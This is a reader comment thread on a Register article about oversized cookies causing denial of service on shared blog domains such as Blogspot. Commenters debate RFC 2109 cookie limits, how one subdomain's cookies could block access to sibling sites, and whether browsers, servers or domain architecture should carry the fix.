back to article MONSTER COOKIES can nom nom nom ALL THE BLOGS

Giant cookies could be used to create a denial of service (DoS) on blog networks, says infosec researcher Bogdan Calin. Such an attack would work by feeding users cookies with header values so large that they trigger web server errors. Calin created a proof of concept attack against the Google Blog Spot network after a …

  1. as2003

    Although section 6.3 of RFC 2109 (written in 1997) is talking about the client-side, I think it's not unfair to infer that a server should be able to support requests with at least 300 x 4kb cookies.

    In his test, Bogdan Calin uses 100 x 3k cookies.

    6.3 Implementation Limits

    Practical user agent implementations have limits on the number and size of cookies that they can store. In general, user agents' cookie support should have no fixed limits. They should strive to store as many frequently-used cookies as possible. Furthermore, general-use user agents should provide each of the following minimum capabilities individually, although not necessarily simultaneously:

    • at least 300 cookies
    • at least 4096 bytes per cookie (as measured by the size of the characters that comprise the cookie non-terminal in the syntax description of the Set-Cookie header)
    • at least 20 cookies per unique host or domain name

    6.3.1 Denial of Service Attacks

    User agents may choose to set an upper bound on the number of cookies to be stored from a given host or domain name or on the size of the cookie information. Otherwise a malicious server could attempt to flood a user agent with many cookies, or large cookies, on successive responses, which would force out cookies the user agent had received from other servers. However, the minima specified above should still be supported.

    1. pklausner

      Wrong inference?

      > I think it's not unfair to infer that a server should be able

      > to support requests with at least 300 x 4kb cookies.

      >

      Doesn't the quoted section translate to "at least 20 x 4kb cookies"?

      Which makes much more sense than 1.2MB sized requests...

      1. as2003

        Re: Wrong inference?

        Yes, good point. My mistake.

        Anyway, it sounds like the behaviour needs to be better defined.

  2. James 51

    does this mean that if we disable cookies it prevents the attack from working?

    1. phuzz Silver badge
      Facepalm

      Yes.

      In the nicest possible way, all the information was right there in the article for you to read, perhaps you should pay more attention in future?

  3. Tom 38

    Not really denial of service

    The "attack" does not force excess resource consumption, and the service is still available, just not to afflicted clients.

    1. Stevie

      Re: does not force excess resource consumption

      Er ... 0.8 meg of bandwidth wasted ... per request ... each request must be processed so it can be rejected so cycles burned for no good effect (server admin not happy, browser user not happy) ... howevermany watts of walljuice burned for no advantage ... what am I missing?

  4. Nick Ryan Silver badge

    So what this really means is that for any shared website domain service (commonly blogs, but not restricted to this), one of these shared resources could prevent the user, or more accurately a specific User Agent (web browser), from accessing any service on the same shared website domain.

    In other words, if you have a structure of:

    site1.example.com

    site2.example.com

    site3.example.com

    site3.example.com could respond with an abnormally large number or large cookies for example.com, in total more than the web server is designed or configured to support. These maliciously sized cookies would be included with every request to any example.com resource, effectively blocking access to example.com and all sub-domains.

    Ouch. All we need now is for a Cross-Site-Cookie vulnerability and a malicious website could block access to any arbitrary website.

    Interesting to hear where the most appropriate fixes for this will be, my guess is the only possible or sensible location is a fix to web browsers as the web servers can't tell a given UA to not send cookies and AFAIK it's not possible to limit the upward propagation of cookie paths on the server either as these are client controlled. That'll scupper those that can't update their web browsers due to supplier lock in.

    1. Anonymous Coward
      Anonymous Coward

      Bingo

      Yup, servers can't properly fix this. If they accept unlimited cookies they'll get DoS'd. There's no way to skip long cookies without receiving and parsing them... for example:

      GET /archive/2014/06/browsers-are-total-crap

      ...most of the important headers...

      Cookie: <100 MB of garbage>

      Connection: keep-alive

      Cache-Control: max-age=0

      I suppose a server could stop after ~80k of cookie and ASSUME those last two headers are the only ones after Cookie, but that seems dodgy.... and more importantly it would block POSTs from commentards.

      1. Robert Helpmann??
        Childcatcher

        Re: Bingo

        ...a Google security rep [said] the risk was a problem for web browser developers to fix, rather than a lone web app providers...

        Perhaps someone can set me straight. Doesn't this amount to poor error handling on the part of the web servers? I would think that this is the sort of thing that mail servers have to deal with in handling attachments. Why can't cookies be filtered based on size, even if it is not by the web server itself? I understand that mail and web servers are not the same thing, but the issue has to have come up before. It would seem to me that the solution used in one case should at least be considered in the other.

        1. Tom 38

          Re: Bingo

          No, it is perfect error handling on the part of the web servers. Normal, non malicious clients do not send multi megabyte GET requests to web servers, and thus it is perfectly correct for the server to terminate the connection with a "413 Request Entity Too Large" error.

  5. Anonymous Coward
    Anonymous Coward

    Considering the tripe that makes up most blogs, this would be a bad thing because?

  6. Anonymous Coward
    Anonymous Coward

    My twopence

    As user as2003 has insinuated, the current state of things both at the client and server level seems a reasonable compromise.

    Would the problem not be, rather, one of site architecture? Specifically, with hosting unrelated and untrusted subdomains under the same domain? This possibly relates not only to cookies but also, e.g., to X509 certificates (subdomain.domain.com manages to get a cert for *.domain.com).

    For a player with deep pockets such as Google, the solution would be to get their own root domain, e.g., .blogspot and move blah.blogspot.com to blah.blogspot.

    1. Anonymous Coward
      Anonymous Coward

      Re: My twopence

      One downvote but no reply... would anyone sufficiently knowledgeable care to critique the above post?

  7. Anonymous Coward
    Anonymous Coward

    Remember when cookies

    only stored the last time you visited the site and could do no harm, according to privacy experts?

    That must be around 1995-1998. Internet was slow and expensive, but at least it wasn't so god damn dangerous and virus was almost rare. These days you got to be on your toes all the times.

  8. Anonymous Coward
    Anonymous Coward

    Been there

    This already happens when your marketing department decides, without review, to install a pile of 3rd party analytics software that they heard is new and cool. Your site gets slower, slower, slower, and then goes away.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon